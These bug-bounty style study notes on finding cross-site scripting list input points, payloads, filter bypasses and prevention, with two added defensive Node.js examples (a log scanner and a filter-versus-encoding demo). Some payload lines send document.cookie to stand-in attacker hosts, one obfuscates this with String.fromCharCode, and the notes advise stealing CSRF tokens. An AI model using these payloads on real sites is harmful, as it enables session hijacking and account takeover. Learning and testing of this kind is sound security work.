XSS
Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.
There are three main kinds of XSS. The difference between them is in how the XSS payload travels before it gets delivered to the victim user:
Reflected XSS, where the malicious script comes from the current HTTP request.
Stored XSS, where the malicious script comes from the website's database.
DOM-based XSS, where the vulnerability exists in client-side code rather than server-side code.
Step 1: Look for Input Opportunities
Look for opportunities to submit user input (comments, user profiles, blog posts, forms, search, and the name and username fields in sign-ups).
Even drop-down menus and numeric values are chances (you can edit the value in Burp).
For reflected and DOM XSS, look at URL parameters, fragments (#), or pathnames that get displayed back.
Step 2: Insert Payloads
Inject different payloads, like event handlers: <img src=x onerror=alert('Hunter')>
Try different URL schemes: javascript:alert, data:text/html,<script>alert('XSS by Vickie')</script>
Try encoding.
Check whether users can load an image from a URL and use it as their profile picture: https://example.com/upload_profile_pic?url=IMAGE_URL
Take a look at the XSS cheat sheet from PortSwigger.
Browsers use different tags and event handlers, so test with different browsers.
Close out previous HTML tags: <img src=""/><script>location="http://attacker.com";</script>">
Inject special chars and STUDY the response: >'<"//:=;!--
Use XSS Hunter for blind XSS.
Search for input fields like comments and URL params.
Fuzz parameters using Arjun and param-miner to get hidden params.
Inject the special chars >'<"//:=;!-- into those too, STUDY the response, and build your payload from the ones that didn't get escaped or encoded.
Can you inject into non-changing values (e.g. usernames)?
Is the app escaping or deleting the <script> tags?
Try event handlers
Try URL schemes: javascript:alert, data:text/html,alert('Hunter')
Use recursive tags: <scrip<script>t>location='http://attacker_server_ip/c='+document.cookie;</scrip</script>t>
Try capitalization and encoding
Try the eval() function
Does the app filter special chars like single and double quotes?
Use the String.fromCharCode function to map ASCII codes to a string: <scrIPT>location=String.fromCharCode(104,116,116,112,58,47,47,72,117,110,116,101,114,47,63,99,61)+document.cookie;</scrIPT>
Try HTTP Parameter Pollution
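From the defender's side, every probe and bypass listed above leaves a trace in the web server access log. Added example, not from these notes: a small Node.js scanner that URL-decodes request targets (including double encoding) and flags the patterns from this section. The log lines are constructed for the demo and the rule names are my own.

```javascript
// Added example, not from the original notes: spot the XSS probes described in
// the notes in web-server access logs. Node.js, no dependencies.

// Constructed sample lines in Combined Log Format (not real traffic).
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(%27Hunter%27)%3E HTTP/1.1" 200 5210 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [10/Oct/2023:13:56:02 +0000] "GET /profile?name=%3Cscrip%3Cscript%3Et%3Elocation%3D%27http://attacker_server_ip/c%3D%27%2Bdocument.cookie%3B%3C/scrip%3C/script%3Et%3E HTTP/1.1" 302 0 "-" "curl/8.0"',
  '198.51.100.9 - - [10/Oct/2023:13:56:10 +0000] "GET /redirect?url=javascript:alert(1) HTTP/1.1" 302 0 "-" "curl/8.0"',
  '192.0.2.44 - - [10/Oct/2023:13:57:00 +0000] "GET /items?id=%253CscrIPT%253Elocation%253DString.fromCharCode(104,116)%252Bdocument.cookie HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
  '192.0.2.45 - - [10/Oct/2023:13:58:00 +0000] "POST /login HTTP/1.1" 200 300 "-" "Mozilla/5.0"',
];

// One rule per technique from the notes above (rule names are mine).
const RULES = [
  { name: 'html tag', re: /<\s*\/?\s*[a-z][\w-]*/i },
  { name: 'event handler', re: /\bon[a-z]+\s*=/i },
  { name: 'script url scheme', re: /\b(javascript|data):/i },
  { name: 'cookie theft', re: /document\.cookie/i },
  { name: 'char code obfuscation', re: /fromCharCode/i },
  { name: 'nested tag filter bypass', re: /<[a-z]*<\s*[a-z]/i },
];

// Decode repeatedly (at most 3 rounds) so double-encoded probes are seen
// the way the application eventually sees them. '+' is a form-encoded space.
function fullyDecode(s) {
  let out = s.replace(/\+/g, ' ');
  for (let i = 0; i < 3; i++) {
    let next;
    try { next = decodeURIComponent(out); } catch (e) { break; } // malformed %xx
    if (next === out) break;
    out = next;
  }
  return out;
}

// Pull client IP, timestamp, method, request target and status out of a
// Combined Log Format line; returns null for lines that do not parse.
function parseLine(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Decode the target and collect the names of every rule that matches.
function scanLine(line) {
  const req = parseLine(line);
  if (!req) return null;
  const decoded = fullyDecode(req.target);
  const hits = RULES.filter((r) => r.re.test(decoded)).map((r) => r.name);
  return { ip: req.ip, time: req.time, target: req.target, decoded, hits };
}

// Only lines with at least one hit are returned.
function scanLog(lines) {
  return lines.map(scanLine).filter((r) => r && r.hits.length > 0);
}

for (const r of scanLog(SAMPLE_LOG)) {
  console.log(`${r.ip} [${r.hits.join(', ')}] ${r.decoded}`);
}
```

Matching on the decoded target rather than the raw one is what catches the double-encoded fromCharCode probe on the fifth line; matching the raw bytes would miss it.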
Filter input on arrival.
Encode data on output: encode the output to prevent it from being interpreted as active content.
Use the Content-Type and X-Content-Type-Options headers to ensure that browsers interpret the responses in the way you intend.
Use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.
Escape special chars.
Use an HTML entities function.
Sanitize and validate every user input.
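Added example, not from these notes or from PortSwigger: it ties the bypass list above to the prevention list by running a naive "strip <script>" filter and proper HTML entity encoding over the payloads from the notes, and it builds the Content-Type, X-Content-Type-Options and CSP headers the list recommends. Node.js, no dependencies; the header values and the use of the notes' payloads as test input are my assumptions.

```javascript
// Added example, not from the original notes: why "filter input" alone fails
// and "encode on output" holds. Node.js, no dependencies.

// A naive blocklist filter of the kind the bypass tricks above defeat:
// it strips the literal <script> and </script> once, case-sensitively.
function naiveFilter(input) {
  return String(input).replace(/<script>/g, '').replace(/<\/script>/g, '');
}

// HTML entity encoding for text and quoted-attribute contexts. Every
// character that could open a tag, end an attribute or break out of a
// quote becomes an entity, so the browser renders the input as plain text.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function encodeHtml(input) {
  return String(input).replace(/[&<>"'\/]/g, (c) => HTML_ENTITIES[c]);
}

// Headers from the prevention list above; the values are assumptions for
// this example. Without 'unsafe-inline', this CSP blocks inline <script>
// blocks, on* event handler attributes and javascript: URLs, so a payload
// that slipped past encoding still would not execute.
function securityHeaders() {
  return {
    'Content-Type': 'text/html; charset=utf-8',
    'X-Content-Type-Options': 'nosniff',
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
  };
}

// A browser can only open a tag from a raw '<' followed by a letter or '/',
// so this is the check for "active markup survived the defence".
function containsTagOpener(s) {
  return /<\/?[a-z]/i.test(s);
}

// Run both defences over one payload and report whether markup survived.
function compareDefences(payload) {
  const filtered = naiveFilter(payload);
  const encoded = encodeHtml(payload);
  return {
    filtered,
    filteredIsSafe: !containsTagOpener(filtered),
    encoded,
    encodedIsSafe: !containsTagOpener(encoded),
  };
}

// Payloads taken from the notes above, used here as constructed test input.
const PAYLOADS = [
  "<img src=x onerror=alert('Hunter')>",
  "<scrip<script>t>location='http://attacker_server_ip/c='+document.cookie;</scrip</script>t>",
  "<scrIPT>location=String.fromCharCode(104,116,116,112)+document.cookie;</scrIPT>",
];

for (const p of PAYLOADS) {
  const r = compareDefences(p);
  console.log(`filter safe: ${r.filteredIsSafe}  encode safe: ${r.encodedIsSafe}  after filter: ${r.filtered}`);
}
```

The recursive-tag payload is the instructive one: stripping <script> once turns it into a clean <script> tag, which is exactly why the notes above list it as a bypass, while entity encoding leaves no raw '<' for the parser to start a tag from.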
Steal the user's CSRF token and send it to your server as a parameter, so it shows up in your logs.
Automatically redirect the victim to malicious pages and perform other harmful operations such as installing malware.
Make sure to assess the full impact of that particular XSS to include in your vulnerability report.
Look for user input opportunities on the application.
Insert XSS payloads into the user input fields you've found. Insert payloads from lists online, a polyglot payload, or a generic test string.
Confirm the impact of the payload by checking whether your browser runs your JavaScript code. Or, in the case of a blind XSS, see if you can make the victim's browser generate a request to your server.
If you can't get any payloads to execute, try bypassing XSS protections.
Automate the XSS hunting process.
Consider the impact of the XSS you've found: who does it target? How many users can it affect? What can you achieve with it? Can you escalate the attack by using what you've found?
If the program you are targeting allows automated testing, you can use Burp Intruder or other fuzzers like wfuzz or FFUF to run an automatic XSS scan on your target; you can find many payloads for that online.
Recommended Writeup: